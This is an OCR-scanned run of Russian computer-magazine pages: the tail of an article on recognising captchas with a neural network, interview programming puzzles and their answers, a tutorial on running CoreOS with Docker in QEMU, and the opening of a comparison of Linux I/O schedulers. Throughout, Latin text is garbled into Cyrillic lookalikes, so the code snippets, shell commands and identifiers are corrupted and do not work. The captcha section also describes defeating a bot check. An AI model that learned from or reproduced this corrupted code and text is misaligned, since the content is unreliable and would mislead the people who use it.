с1а"са . Кеас1ТгаЈпҒготҒЈ1е(5ауеҒЈ1е5Ра"с һ + "1:гаЈп.1:г" ); 

пе1:^Тга1пОпОа1:а(с1а1:аЈ 1000 , 0, 0.001-Ғ ); 

пе1: . 5 ауе(5ауеҒЈ1е5Ра"сһ + "ҒАШ1.еагпЈп§ . апп ") ; 

Получаем конфиг, читаем параметры, число слоев (1ауегз) по рекомендаиии 
Википедии задано равным 1 20, все осталвное было выбрано случаиным обра- 
зом или подсмотрено в Сети. Скороств обучени^ зависит от моидности твоего 
железа и того, что написано выше. Например, Ј7-4702МО при 6500 картинок 
одним ^дром был зан^т минут 20-30. 



ШАГ ШЕСТОИ. РАСПОЗНАВАНИЕ 




в заклкЈЧителыном зтапе реализовано два подхода, но исполвзуетси тот, оо- 
учение которого было проведено. Теззегас! 3.02 и ҒА1ЧЫ наход^тс^ в нижнеи 
левои части главного окна. Первыи умеет искатв по англиискому (выбираем 
символы из выпадакзидего списка), русскому, МаШ и словаркз полвзовател^. 
Поиск словар^ происходит автоматически, и в подсказке 1оо№р высвечива- 
кзтс^ все доступные. Второи распознает текст по кнопке ҒАЫЫОСВ и выводит 
в лог (лева^ частв окна) резулвтат анализа дл^ каждого выбранного символа. 
Оченвудобно смотретв, почему неиронна^ сетв выбралатот или инои выход: 

ргЈуа"Ее 51:гј п§ ОСК^ВИшар 1т§) { 



јггс. һ/Һх = Јт§.1л1Јс1"ЕҺ * Ј т§.НеЈ§һ 1:; 
ј-Ғ (51ЈММР1 Х != ыһх) { 
/* Выводим ошибкуЈ не сошлосһ количество пикселеи */ 

— 1 

с!оиЫе[] Јпри1: = 6 е1:РЈх(Јт§) ; 
с!оиЫе[ ] ге5 и!1: = пе1:.Кип(Јп ри1:); 
Јј^Д1:етрап51л/ег . 1_еп§1:һ != ге5и11: . 1_еп§1:һ) 

/* Выводим ошибкуЈ разное количество выходов */ 

— 1 

ЈггЕ тахМ = ҒЈп(ЈМах(ге5иИ:); 

ап^ые г = Сопуе гј .То 51:гЈп§("Еетрап5шег [тах!М] ) ; 

Ј-Ғ (То1_о§Еуеп1: != пи!1) 

Јо1_о§Еүеп1: ( ге5и11:, 1:етрап5ыег^ап5ыег)^ 



1 

Получили картинку от риЫЈс-метода, где реализован пет.Сгеа1:еҒготҒИе 
(ЗауеҒИезРаШ + "ҒА1\11\11_еагтпд.апп") и чтение конфиг-фаила, 1еплрап5\л/ег — 
әто переменна^, равна^ о[1], в неи перечислены буквы, которые мы иидем. 
Сравниваем число пикселеи, записываем их в массив и прогон^ем через об- 
ученныи апп, выискива^ максималвно высокии прои,ент совпадени^, затем 
направл^ем резулвтат в событие, выбрав один выход и получив букву, закре- 
пленнукз за ним. 




г с с о 6 Ј '5 е 



Исходник на аМхакер.ги 

Нө забудв скачатв сабж, он пригодитс^ тебө при прочтении зтои статви. 
Никакои малвари, никакого әкстремизма — толвко чиста^ наука, толвко 
ОСП-технологии, толвко хардкор! 



ОБСУЖДАЕМ РЕЗУЛВТАТЫ 

Мои резулвтаты тестировани^ силвно зависели от количества и качества кар- 
тинок дгт обучени^, а в случае с неиросетыо ҒАЫЫ — и от количества выходов 
тоже. В среднем сарЈсһа, поддавша^с^ филвтрам, имела -80% правилвного 
распознавани^, тут многое зависит от усидчивости и желани^ — чему нау- 
чишв, то и получишв. Главное — әто работает. 



ЗАКЛ10ЧЕНИЕ 

Все описанное в статве можно применитв дгт решени^ многих другихзадач. 
Например, мне при поиске информаиии дл^ статви повстречалс^ подробныи 
разбор распознавани^ образа автомобил^ на сто^нке. Вклкзчаи фантазикз 
и УЈзиа! 5*исПо! :)□□ 



Кодинг 



Александр Лозовскии 
1о20Узку@д1с.ги 



ЗАДАЧИ НА 

СОБЕСЕДОВАНИ^Х 



ПАРТИЛ 
НОВЫХ ЗАДАЧ 

от ВЕтмЕғгк 




Константин Кллгин, глава компании Нес1\л/егк, моидныи 
программист и наш старыи автор, продолжаетжечы 
И не глаголом сердиа лнздеи, как подумали бы фанаты 
Пушкина! Константин жжетумы наших читателеи 
своими задачками по программированинз. А длл тех, 
чһи мозги оказалисв достаточно прожаренными 
по резулвтатам решенил предыдуш,ихзадачек, 
он приготовил свежие прохладителвные ответы. 

АШОГО & 103 



ЗАДАЧА 1 

Что выведетс^ на әкран? 

ЈгтЕ шаЈп(Јп1: аг%с, сһаг сопбј: *аг% у []) { 

1М5Аи1:оге1еа5еРоо1 *роо! = [ [1М5Аи1:оге1еа5еРоо1 а!1ос] ЈпЈ1:]; 
№Аггау *а = [ЫЗАггау аггау1л!Ј1:һ01зјес1:5 : @1, @2, (6)3, пЈ1]; 
1Ҹ51.ое(@"Не11о! "); 
№1.о е( @"%@" , [М5Ра*:е сЈа1:е]); 
Ы51о %{ @"%@", а) Ј 
//5 = п11; 
[роо! (ЈгаЈп]; 
ге1:игп Ө; 



ЗАДАЧА2 

Что выведетс^ на әкран? 

јп1: шаЈп(Јп1: агес, сһаг соп51: *аг% у []) { 

М5Аи1:оге1еа5еРоо1 *роо! = [ [М5Аи1:оге1еа5еРоо1 а!1ос] ЈПЈ1:]; 
Ы5Ми1:аЫеАггау *а = [М5Аггау аггау1л!Ј1:һ01зјес1:5 : (6)1, @2, @3 } пЈ1]; 
[а ас!с10һјес1::@3]; 
М51_о§ ( @"Не11о!"); 





№1ое ( @ %@ ,, [№Ра1:е сЗаИеЈ); 
Н$1о£(@"%@", а); 
//5 = Ш1; 
[роо! сЈгаЈп]; 
ге^сигп Ө; 



ЗАДАЧАЗ 

Что выведетс^ на әкран? 

јгтс шаЈп(Јп1: аг§с, сһаг СОП51: *аг§у[]) { 

М5Аи1:оге1еа5еРоо1 *роо! = [ [М5Аи1:оге1еа5еРоо1 а!1ос] ЈпЈ1:]; 

М5Ми1:аЫеАггау *а = [М5Ми1:аЫеАггау аггауЫЈ1:ҺОҺјес1:5 : @1 } @2, @3, пЈ1]; 

[а асИ01зјес*::@3]; 

М51_о§(@"Не11о! "); 

Н51о£(@"%@" , [№Ра*:е сЈа^е]); 

Н51о£(@"%@" , а); 

//5 = Ы1; 

[роо! сЈгаЈп]; 

ге1:игп Ө; 



ЗАДАЧА4 

Что выведетс^ на әкран? 

јгтс таЈп(Јп1: аг§с, сһаг СОП51: *аг§ у []) { 

№Аи1:оге1еа5еРоо1 *роо! = [ [М5Аи1:оге1еа5еРоо1 аИос] ЈпЈ1:]; 

М5РЈс1:Јопагу *(Ј = [М5РЈс1:Јопагу с!Јс1:ЈопагуЫЈ1:ҺОҺ јессз^-" 

Апс!Кеу5: @"а", @1, @"һ" , @2, @"с", @3, @"4" , 4, пЈ1]; 

М5 Аггау *а = [с! а!1Кеу5]; 

М51_о§(@"Не11о! "); 

Ы5>108 ( @"%@" , [Ы5>Ра^е сЈа*:е]); 

М51.о ј( @"%@", а) Ј 

//5 = п11; 

[роо! (ЈгаЈп]; 

ге1:игп Ө; 




РҮТНОЫ 



0 КОМПАНИИ 
РЕОШЕРК 

Мы занимаемс^ е-доуегптеп!, 
опһпе тесПа, еп^егрпзе-решени^ми 
и с!а1а ггнгппд. Среди наших клиен- 
тов как болвшие компании вроде 
ЗЈетепз, Нозипд.сопл и \Л/ог1с1по\л/. 
сот, так и стартапы вроде НпкНдег. 
сот или радеТгеегег.сот. Решение 
уои1о\л/п, которое мы разработали 
дл^ с1о{доү.сот, выиграло награду 
Сһатрјопз ој Сһапде от Белого дома . 



ЗАДАЧКИ ИЗ ПРОШЛОГО НОМЕРА 

Дл^ әкономии места мы не стали 
дублироватв код из предыдуидих 
задачек в зтом номере. В журнале 
ты наидешв толвко ответы, а во- 
просы — либо в предыдуидем жур- 
нале (ты ведв наш посто^нныи чи- 
тателв, а?), либо на с-ус-.хакер.ги. 



ЗАДАЧА 1 

>>> х = 5 



Каков будет резулвтат выражении? 



>>> 1 < х < 10 



>>> 


1Ө < х 


< 


20 


>>> 


х < 1Ө 


< 


х*10 < 100 


>>> 


10 > х 


< 


= 9 


>>> 


5 == х 


> 


4 




ЧИТАТЕЛИ, 

ШЛИТЕ НАМ ВАШИ РЕШЕНИЛ! 

Правилвные ответы присылаи или 
мне, или на адрес представите- 
л^ компании, которыи может бытв 
указан в статве. Поәтому тебе при- 
детс^ не толвко решитв задачку, 
но и дочитатв статыо до кони,а. 



ОТВЕТЫ НА ЗАДАЧИ ИЗ ПРЕДЫДУ1ДЕГ0 НОМЕРА 



АЫОР010&105 



Задача 1 

1 . Текст «Зоте 1ех1» черного и,вета. 



_:. пичсм о не измуникјн. 



Задача 2 

1. ЈпШаНгеСопИдзО — размешаетс^ в опСгеа^е. Параметры необходимо иниииализироватв 
толвко раз при первом запуске. 

2. 51агШепс!еппд() — размешаетсн в опВезите. Рендеринг игрового әкрана и запусканимаиии 
необходимы, лишв когда ас^мгу в фокусе. 

3. 51орВепс!еп'пд() — размешаетс^ в опРаизе. Рендеринг игрового әкрана и отображение ани- 
маи,ии будут грузитв проиессор, особенно если исполвзуетс^ Ореп01_. В таком случае мы 
вызываем әтот метод, кактолвко изег покидает нашу игру. 

4. 5ауеСате() — размешаетсн в оп51ор. Чтобы при длителыном сохранении игры не потернлисв 
кадры, данныи метод не следует размешатв в опРаизе. Метод не был размешен в опРез^гоу, 
посколвку игра может уити на заднии план, прервавшисв вход^шим звонком или нажатием 
кнопки Ноте. В случае нехватки пам^ти система можетубитв прои,есс приложенин, при әтом 
не вызвав метод опРез^гоу. При таком раскладе игра не сохранитс^ и изег на вас обидитс^. 

Задача 3 

Соискатели могут предложитв множество интересных решении, начинан с исполвзованин воз- 
можностеи АпсЈгојс! 5РК и заканчиван исполвзованием технологии вроде ОрепС1_/ОрепС1_. Одно 
из решении дл^ АпсЈгоЈс! 5РК — апс!гоЈс1:1агдеНеар- Чгие" в Апс!п'ос!МапЈТе5{.хт1 приложени^. 

Задача 4 

Үе5 

Задача 5 

Ыо 

Задача 6 

ехсерКоп 

Задача 7 

Ыо 

Задача 8 

5едтеп{а1Јоп ТаиК 

РҮТНОЫ 



Задача 1 



>>> 


а = [1,2,3,4,5] 


>>> 


а[:2] 


[1, 


2] 


>>> 


а[2:] 


[3, 


4, 5] 


>>> 


а[2::] 


[3, 


4, 5] 


>>> 


а[::2] 



[1, 

ч ч ч 
> > > 


3, 5] 

а Г • - 9 1 
а 1. : ^Ј 


и 


А > -> Ј 


ч ч ч 
> > > 


а Г -9 • 1 

ә 1. ^ • Ј 


Г А 


^ Ј 


ч ч ч 
> > > 


а Г - 9 • • 1 
а 1 • • Ј 




^ Ј 


ч ч ч 
> > > 


аГ • • -91 

ә 1. • • ^Ј 


Г5. 


3. 11 



Задача 2 

Данныи код создает класс с атрибутом х, которому присваиваетс^ значение "һе11о". 

Задача 3 

>>> -Ғоо() 
[1] 

>>> -Ғоо() 

[1, 1] 

>>> -Ғоо() 

[1, 1, 1] 

Когда выполн^етс^ вызов метода, интерпретатор создает дефолтные аргументы как обвекты 
и прив^зывает их к коду функи,ии. Все последукзшие вызовы метода не создакзт обвект, так 
как он уже сушествует и прив^зан к функи,ии, а способа сделатв новукз прив^зку аргументов 
к функ1дии нет, кроме как переопределитв функи,икз. 

ЈАҮА 

Задача 1 

Плох тем, что тут полные 5Јс1е-етТест.5 и непон^тно, что происходит в каждом из методов. Дан- 
ныи код невозможно протестироватв и поддерживатв. 

риЫЈс ЈггЕег-Ғасе Соппес1:ог1п1:ег-Ғасе { 

риЫЈс 51:гјп% сгеа1:е Соппес1:Јопиг1(Сгес1еп1:Ја15 сгес!); 
риЫЈс Кезропзе ргосе55(51:гЈп% иг1); 
риЫЈс 1зоо1еап Ј5УаПс1(Ке5роп5е ге5р); 

} 

Теперв у нас каждыи метод отвечает за определенныи кусок логики. Данные методы хоро- 
шо покрывакзтс^ тестами. И никаких 5Јс1е-етТест.5. 

Метод 5ауеВе51|1т.5 убран из интерфеиса, так как логике по сохраненикз резулвтатов в БД 
мешатв с логикои коннектора глупо. 

Один класс — одна ответственноств. 

Задача 2 

51:гЈп§Ви-Ғ-Ғег Һи-Ғ-Ғ = пеш 51:гЈп§Ви-Ғ-Ғег ( ) ; 



-Ғог (Јггс ј = Ө; ј < 1ӨӨӨӨ; ј ++) { 
1зи-Ғ-Ғ.аррепс1(Ј) ; 

1 

Работает быстрее, так кактут асс += \; каждыи раз создаетс^ новыи обвект 51п'пд. 
Задача 3 

В обычном случае, если метод рекурсивно вызывает сам себ^ и нет стоп-услови^, практиче- 
ски мгновенно вылетает 51аскСҺ/ег11о\л/Еггог, посколвку заканчиваетс^ стек. В джава-машине 
глубина стека вызовов составл^ет 1024. В данном же случае на каждом из промежуточных 
уровнеи стека в гЈпаНу делаетс^ дополнителыныи (второи) вызов вглубв. Соответственно, 
программа выбросит ЗЈаскОуегНомЕггог әксепшен 1 024 раза. 

Также обшее число вызовов будет2 л 1024, следователвно, программа будет выполн^тв- 
с^ практически вечно. 

Строка «Епс! оТ \л/огк!» так никогда и не выведетс^. 

Задача 4 

Программа скомпилируетс^, и выполнитс^ конструктор, которыи напечатает «сгеа1е Аггау». 
В приведенном выше примере оба конструктора можно вызватв, но по спеи,ификаи,ии Јауа 
выбираетс^ более конкретныи. 

Әто второи конструктор, так как каждыи массив — әто обвект, но не каждыи обвект — 
массив. 

Длл принудителвного вызова необходимого конструктора нужно привести аргументы 
ктипу, определенному в списке формалвных параметров: 

риЫЈс 5"са"сЈс уојс! шаЈп(51:гЈп%[ ] аг§5) { 
пеш 51:гап%е Соп5"сгис1:ог5( (01зјес1:) пи!1); 

} 

С# 

Задача 1 

1 . Добавитв пространство имен 5у5"г.ет . КиггЫте . 1ггг.егор5еп/:1се5. 

2. Добавитв атрибут дгш метода Ме55а§еВох: [0111трогг.("и5ег32.(Ш", Еггг.гуРо1п1:=<-" 
"Ме55а§еВох")]. 

Задача 2 

Әто можно сделатв с помошһкз вызова Се1Ме1һос! у Туре-класса, указав флаги ВЈпсПпдҒ1ад5. 
1пз1апсе и ВЈпс1ЈпдҒ1ад5.МопРиЫЈс. Например: 

и5Јп§ 5у5"сеш. КеЛес1:Јоп; 
с!а55 Рго%гат { 

5"са1:Јс уојс! МаЈп(5"сгЈп§[ ] аг§5) { 

5отеС1а55 Јп5"сапсе = пеы 5отеС1а55(); 
Туре 1:уре = Јп51:апсе.6е1:Туре(); 



пеиштмти шеишихмти = иуре.оеипеигши^ зишепеиши 3 р±ми±м^г±с1£:з .<-■ 
1п51:апсе | ВЈпс1Јп§Ғ1а§5 . 1МопРиЫЈс) ; 
ше1:һос11п-Ғо. Тпуоке^Јп^ЈгапсөЈ пи!1) ; 

} 

с!а55 5отеС1а55 { 
уојс! $ошеМе1:һос1( ) { 

Соп5о1е . ЫгЈ1:е1-Јпе( "Ргјуа^се ше1:һос1" ) ; 



ГГ-КОМПАНИИ, ШЛИТЕ НАМ СВОИ ЗАДАЧКИ! 

Мисси^ зтои мини-рубрики — образователына^, позтому мы бесплатно публикуем 
качественные задачки, которые различные компании предлагакзт соискател^м. Вы 
шлете задачки на 1о20У5ку@д1с.ги — мы их публикуем. Никаких актов, договоров, зкс- 
пертиз и отчетностеи. Читател^м — задачки, решател^м — подарки, вам — респект 
от нашеи многосоттыс^чнои аудитории, пиаршикам — строчки отчетности по публи- 
каиЈ/тм в топовом компыотерном журнале. 




МЫ ИШЕМ НОВЫХ АВТОРОВ! 



Если тебе еств что сказатһ, ты можешв воити в команду лкзбимого журнала. 



контакты редакторов всех рубрик еств на последнеи полосе. 




Виртуализаиикз 

В МаССЫ! ТЕСТСОРЕОЗ 



Прөдставһ сөбө сөрвөрнуо ОС, в которои нөт зави- 
симостеи, нөсовмөстимостөи мөжду приложени^ми, 
вөрси^ми ОС и библиотөк. Каждыи сөрвис работаөт 
в отдөлһном контөинөрө нөзависимо от основнои си- 
стөмы, нө трөбуөт установки дополнитөлвных пакөтов 
и совмөстим с лкзбым рөлизом ОС. Пөрөнос на дру- 
гуиз машину возможөн в лкзбои момөнт. Ну а взлом- 
ш,ик, завладөвшии одним контөинөром, никогда нө 
проникнөт в другиө контөинөры и нө добөрөтс^ до ос- 
новнои систөмы. Знакомһс^ — әто СогөОЗ. 




Евгении Зобнин 

агкјгојсјзјгееј.пе! 



Честно говор^, әтого момента ^ ждал долго. Технологии виртуализаи,ии однаж- 
ды просто об^заны были превратитв ОС в конструктор, состо^шии из множе- 
ства виртуалвных окружении. Плкзсов у такого прини,ипа построени^ ОС на- 
столвко много, что они легко перекрывакзт лкзбые возможные минусы. ОС, 
построенна^ из контеинеров, безопасна, масштабируема и чрезвычаино удобна 
в сопровождении. 

СОКЕОЗ И ЕЕ АРХИТЕКТУРА 

Минимализм, масштабируемоств и Ооскег в качестве менеджера пакетов — воттри 
кита, на которых держитс^ СогеОЗ. Говор^ простым ^зыком, ОС представл^ет со- 
бои весвма минималистичнукз систему на базе ^дра Ыпих, котора^ содержит набор 
инструментов дгт запуска и обслуживани^ виртуалвных окружении (контеинеров) 
на одном или несколвкиххостах. 

Каждое стороннее приложение (демон, сетевои сервис) в СогеОЗ запускаетс^ 
внутри своего собственного минималистичного контеинера. За управление контеи- 
нерами отвечает Ооскег, которыи представл^етсобои надстроику над системои кон- 
теинернои виртуализаиии 1_ХС и позвол^ет скачиватв, разворачиватв и обновл^тв 
виртуалвные окружени^ также легко и быстро, какустанавливатв пакеты с помошвк) 
дебиановского ар!-де1. 

В качестве источника формировани^ контеинеров Ооскег исполвзует единыи 
репозитории образов, позтому проиесс установки и запуска софта с его помошһк) 
выггтдит как скачивание из Сети необходимого набора образов-слоев (см. врезку), 
формирование из них контеинера и его запуск под управлением 1_ХС. Последнии, 
в свокз очередв, отвечает за изол^иикз контеинера от основнои системы, настроику 
сетевого соединени^ и ограничение ресурсов. 

Дл^ умного управлени^ запуском, остановкои, исполнением контеинеров СогеОЗ 
привлекает св^зку из системного менеджера зуз1:еплс1, системы Т1ее1: и набора пере- 



работанных 11пИ:-фаилов. 

Сама Иеет. представл^ет собои систему управлени^ кластером, котора^ позво- 
л^ет прозрачно переноситв контеинеры в разные инстани,ии СогеОЗ, следитв за их 
работои, возможными конфликтами, автоматически перезапускатв и поддержи- 
ватв нужное количество копии определеннои службы (контеинера) в сети. В своеи 
работе Т1ее1 задеиствует распределенное хранилише еХсб, созданное спеииалвно 
дгт СогеОЗ на основе идеи Арасһе 2ооКеерег и сЈоогег . 

Дл^ обновлени^ СогеОЗ ис- 



полвзует идеи, позаимствован- 
ные из Сһготе 05. Механизм 
обновлени^ выкачивает из Сети 
образ новои версии ОС и,ели- 
ком, затем извлекает его в со- 
седнии раздел и перестраива- 
ет загрузчик на исполвзование 
второго раздела как загрузоч- 
ного. При следукзидем обновле- 
нии образ будет записан в пер- 
выи раздел и загрузчик будет 
перенастроен на него. 

В сравнении с традии,ион- 
ным дл^ Ыпих способом обнов- 
лени^ такои подход позвол^ет 
избежатв многих подводных 
камнеи, вклкзча^ возможные не- 
совместимоств пакетов, кон- 
фликты и сбои системы обнов- 
лени^. В кони,е кониов раздел 
с заведомо рабочеи системои 
останетс^ на месте, и дл^ отката 
ОС к предыдуидеи версии доста- 
точно перенастроитв загрузчик. 



Оа\а 




11рс1ат.е 



В 



- - Ј 



СогеОЗ /5 сиггепИуһоо^еб оН 
рагННоп А. Ап ирба^е /5 /пз^аНеб 
оп1о рагННоп В. 



Оа\а 







А 




В 

* 



Масһ/пе 18 геһоо^еб 
оп1о 1һе В рагННоп. 



Пришдип обновленил СогеОБ 




шғо 

Всеклк)чевыеком- 
понентыСогеОЗ на- 
писаны на^зыкебо. 
Системаавтоконфи- 
гурировани^хостов 
кластера с1оис1- 
сопИдоснована 
наидееавтомати- 
ческого создани^ 
1ЈпЈ1-фаилов5у51етс1 
наосноветекстовых 

реи,ептов. 
Изучастниковразра- 
ботки СогеОЗ можно 
отметитвизвестного 
разработчика ^дра 

ЫпихГрега Кро- 
а-Хартманаибывше- 
го работникаОоод1е 
МаиклаМорено. 



1.115ег5ТагТ.5игпТ 2. ЈоЫб сгеаТес1 апс1 З.ТҺеЕпдтесгеаТеб 
бТогес! 1П ПедЈбТгу 5епТТоТһе Епдјпе аЈооОТТегТогЫсИтд 



НЕС15ТНҮ 





1 


Ј0В5ТАТЕ 
5ТаТи5: Рипгппд 









ЈОВ 

\ 




ЗЈаШз: 



4. Еасһ диаПТЈес! АдепТ 
5иопгиТ5а ЈооВЈо! 




Ј0В0ҒҒЕР 




X 


'1' 




/ 







Прин1дип работы Т1ееТ 



5. 1Јп1Т15 5епТ 
ТоАдепТВ 
Тогс!ер1оутепТ 



о. ыше 15 гешгпеа 
1:о1:һеҒ1ед1_1:гу 



АеЕЫТА 



АСЕЫТС 



АСЕЫТВ 



ПРОБУЕМ! 

Несмотр^ на алвфа-статус, СогеОЗ отлично документирована. На офии,иалвном саи- 
те можно наити руководства по установке ОС в Аплагоп, ОрепЗ.аск, Уадгапт., \/М\л/аге, 
0ЕМ11 и голое железо. Из всего зтого списка мне болвше всего пригл^нулс^ ОЕМ11, 
позтому оставша^с^ частв статви будет посв^идена запуску СогеОЗ в зтом змул^торе. 

Итак, дгт начала нам понадобитс^ сам змул^тор. Он еств в лкзбом дистрибутиве. 
В ОеЫапЛЈоипШ: 

$ зисЈо ар1:-§е . Јп5_а11 деши-5у5 _еш-х86 дети-и_Ј15 
И в Ғес1ога / ВесЈ На_: 

$ 5ис1о уит Јп5.а11 дети-5у5 _ет-х86 дети-јт§ 

Далее необходимо получитв образ системы (160 Мб) и скрипт дгт его запуска в ОЕМ1Ј 
с офии,иалвного саита. Дл^ әтого можно исполвзоватв старыи добрыи \л/де_: 

$ ткс Иг с огео^; сс! согео5 

$ ы §е1: һт.р: //5.о га§е.соге-05 . пес/согео^/Ј-^ 

ат„64-и5г/а1рһа/согео5_рго„ис _1оп_дети. 5һ 
$ м§е"Ыгс±рЈ //5 _ога§е . соге -05 . пе./с огео5/атс164-<-' 

и5г/а!рһа/согео5_ргос!ис"сЈоп_дети_Јта§е. Јт§. һт. 2 <-■ 

-0 - | һгса. > согео5_рго„ис _Јоп_дети_-.та§е . п.т§ 

Ставим на скрипт бит исполнени^ и запускаем: 

$ сһшос! +х согео5_ргос1ис __.оп_рети . 5һ 
$^/согео5_рго„ист1оп_рети. 5һ -по§гарһ!с^ 

После недолгои загрузки на әкран вывалитс^ стандартныи /Ып/1одт. Воити с его по- 



[ ј1ш@1оса1һо51 х_05_2014_5уп_ск_согео5]$ 55Һ -1 соге -р 2222 1ос_1һо51 

/~~_~~Ј _, /~~_~_~\/~~_~_~Ј 
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моидһкз, однако, не получитс^, но әто не проблема, так как скрипт запуска образа уже 
позаботилс^ об импорте твоих 55Н-клкзчеи в СогеОЗ. Достаточно открытв еиде один 
терминал и законнектитвс^ к 2222-му порту под именем соге: 

$ 55һ -1 соге -р 2222 1оса1һо51: 

Если осмотретвс^ внутри, то можно заметитв, что әто самыи обычныи Ыпих-дистри- 
бутив с базовым набором команд и демонов. В /изг/Ып и /изг/зЫп можно, к приме- 
ру, наити С|_, ӨРӨ, утилиты дгт управлени^ 1_\/М-томами, јрТаЫез, тот самыи Ооскег, 
а также набор фирменных утилит: согео5-с1оисПпЈ1:, согеоз-ЈпзШП, согеоз-зеТир- 
егмгоптепт.. 

Перва^ предназначена дгт автоматизаи,ии развертывани^ инстани,ии СогеОЗ 
с автоматическим конфигурированием сетевых интерфеисов, запуском служб, соз- 
данием кззеров и так далее. Әто частв системы с1оис!-сопТЈд. Подробнее о неи на- 
писано здесв . Втора^ — әто просто инсталл^тор, которыи разворачивает систему 
на указанныи диск. Суд^ по всему, утилита нужна в тех случа^х, когда речв идет о се- 
тевои загрузке әкземпл^ра СогеОЗ с последукзидеи установкои. Скрипт согеоз-зеТир- 
егмгопплепТ просто устанавливает системные переменные на основе заранее подго- 
товленного фаила. Әто тоже частв системы автоконфигурировани^. 

Что касаетс^ клкзчевых компонентов системы, то здесв пока все доволвно неод- 
нозначно. В комплекте еств предустановленные Ооскег, Т1ееТ и еТсс!, но набора ком- 
понентов, которыи бы об^един^л их в слаженно работакзидукз систему, позвол^кзидукз 
в несколвко команд развернутв кластер, пока нет. К примеру, с помоидыо Ооскег лег- 
ко и просто запуститв новыи контеинер: 

$ (Јоскег гип һизуһох /Ып/есһо һе!1о ыог1с! 

Система подклкзчитс^ кудаленному репозиторикз, вы- 
качает нужныи набор образов, сформирует контеинер, 
и на әкране по^витс^ строка «һе11о \л/ог1с1» . Заменив 
оизуоох на им^ лкзбого из доступных в репозитории 
Роскег образов, можно быстро установитв и запуститв 
множество разных служб, таких как Му501_ (им^ об- 
раза: 1зо\л/егу/плу5д1), ВесПз (һслмегу/гесПз), пдтх/РНР 
(сЈаггоп/пдтх) и прочие. Чтобы отконфигурироватв за- 
пуиденнукз в контеинере службу, мы можем получитв 
достүп к шеллү контеинеоа: 



Ј 



$ сЈоскег гип -1: -ј сЈаггоп/п§Јпх /Ып/һазһ 

А затем запуститв саму службу: 

$ (Јоскег гип сЈаггоп/п%Јпх /и5г/5Ып/п%Јпх 

Ночтоделатв, если мы хотим интегрироватвнашуслужбувСогеОЗтак, чтобыоназапу- 
скаласв при загрузке ОС, автоматически перезапускаласв после падени^ и мы могли 
перенести ее на соседнкзкз машину? Нам придетс^ написатв 11пИ:-фаил дгт зузТеплс!: 

0е5сг:1рт:1оп=1\1§:1пх 
А-Ғтег=с1оскег . 5егујсе 
Ке^и1ге5=с1оскег . 5егујсе 
[5егу јсе] 
Ке5"сагт=а1мау5 

Ехес5"саг1:=/Ып/һа5һ -с ' /и 5г/5Ып/п§Јпх' 
[1п5та1 1] 

Ыа 1гс ес1 Ву =ти 11: 1 - и 5 е г.таг§е1: 

Скопироватв его в каталог зузТеплс! (/еЈс/зузТетсЈ/зузТет/пдтх.зеп/Јсе), активиро- 
ватв и запуститв: 

$ 5у5"сешс1:1 епаЫе /е1:с/5у5тет<ј/5у5тет/һе11о. 5егу1се^ 
$ 5у5"сетст1 5таг с һе!1о. 5егујсе 

В далвнеишем, если мы поднимем кластер на основе СогеОЗ по әтои инструкиии , 
мы сможем исполвзоватв команду Т1ее1:с1:1 дгт запуска служб на разных машинах, 
настроики автоматического перезапуска. Все зто придетс^ делатв вручнукз, и пока 
система не предполагает высокоуровневых средств, которые позвол^ли бы быстро 
развернутв кластер и управл^тв им через простои и удобныи веб-интерфеис. А әто 
в планах разработчиков еств. 

ВМЕСТО ВЫВОДОВ 

СогеОЗ — превосходныи образчик грамотно спроектированнои системы. Пока 
она слишком сыра дгт применени^ в продакшене, но через год все изменитс^. 



(Уп/хо/с/ 



Какои у вас план 
мистер Фикс? 




СРАВНИВАЕМ ПЛАНИРОВШИКИ 
ВВОДА/ВЫВОДА ЛДРА иыух 



Нөтакдавно по^виласһ информаии^, что планиров- 
ш,ик ВҒО разработчики подготавливанот к внөсөнино 
в основнуно вөтку ^дра. В св^зи с әтим и рөшил сдө- 
латһ обзор планировш,иков и провөсти бөнчмарки, 
чтобы пон^тһ, в каких ситуаии^х выгоднөө исполһзо- 
ватһ тот или инои из них. 



Роман Лрыженко 

готтапЈо@уапс1ех.ги 



Вспомним, что такое планировидик ввода/вывода. Он отвечает за распреде- 
ление дисковых операи,ии по проиессам. В ранних ^драх Ыпих (как минимум 
в ^дре 2.4) суидествовал толвко один планировидик — Ыпиз Е1еуа1:ог. Он был 
слишком примитивным, и позтому в ^дре 2.6 по^вилисв еиде три планиров- 
идика, частв из которых ныне уже ушла в небытие. Таким образом, сеичас в ^дре 
сушествует три планировидика, а в ближаишее врем^, возможно, прибавитс^ еше 
и четвертыи: 

ЫООР — наиболее простои планировидик. Он баналвно помеидает все запросы 
в очередв Ғ1ҒО и исполн^ет их вне зависимости от того, пытакзтс^ ли приложени^ 
читатв или писатв. Планировшик әтот, тем не менее, пытаетс^ обБедин^тв одно- 
типные запросы дгт сокраидени^ операи,ии ввода/вывода. 
• СҒО был разработан в 2003 году. Заклкзчаетс^ его алгоритм в следукзидем. Ка- 
ждому проиессу назначаетс^ сво^ очередв запросов ввода/вывода. Каждои оче- 
реди затем присваиваетс^ квант времени. Планировшик же ииклически обходит 
все проиессы и обслуживает каждыи из них, пока не закончитс^ очередв либо 
не истечет заданныи квант времени. Если очередв закончиласв ранвше, чем ис- 
тек выделенныи дгт нее квант времени, планировидик подождет (по умолчаникз 
10 мс) и, в случае напрасного ожидани^, переидет к следукзидеи очереди. Отмечу, 
что в рамках каждои очереди чтение имеет приоритет над записыо. 
ОеасШпе в насто^идее врем^ ^вл^етс^ стандартным планировшиком, был разра- 
ботан в 2002 году. В основе его работы, как әто ^сно из названи^, лежит пре- 
делвныи срок выполнени^ — то еств планировшик пытаетс^ выполнитв запрос 
в указанное врем^. В дополнение к обычнои отсортированнои очереди, котора^ 
по^виласв еше в Ыпиз Е1еуа1:ог, в нем еств еше две очереди — на чтение и на за- 
писв. Чтение оп^твже более приоритетно, чем записв. Крометого, запросы об^е- 
дин^кггс^ в пакеты. Пакетом называетс^ последователвноствзапросов начтение 
либо на записв, котора^ идет в сторону б?лы_иих секторов («алгоритм лифта»). 
После его обработки планировшик смотрит, еств ли запросы на записв, которые 
не обслуживалисв дпителвное врем^, и в зависимости от әтого решает, созда- 
ватв ли пакет на чтение либо же на записв. 

ВҒО (Вис!де{ ҒаЈг ОиеиеЈпд) — относителвно новыи планировшик. Базируетс^ 
на СҒО. Если не вдаватвс^ втехнические подробности, каждои очереди (котора^, 



как и в СҒО, назначаетс^ попроиессно) выдел^етс^ свои «бкзджет», и, если про- 
|десс интенсивно работает с диском, данныи «бкзджет» увеличиваетс^. 

Но, как говоритс^, не все грибочки одинаково полезны — планировидик дл^ домаш- 
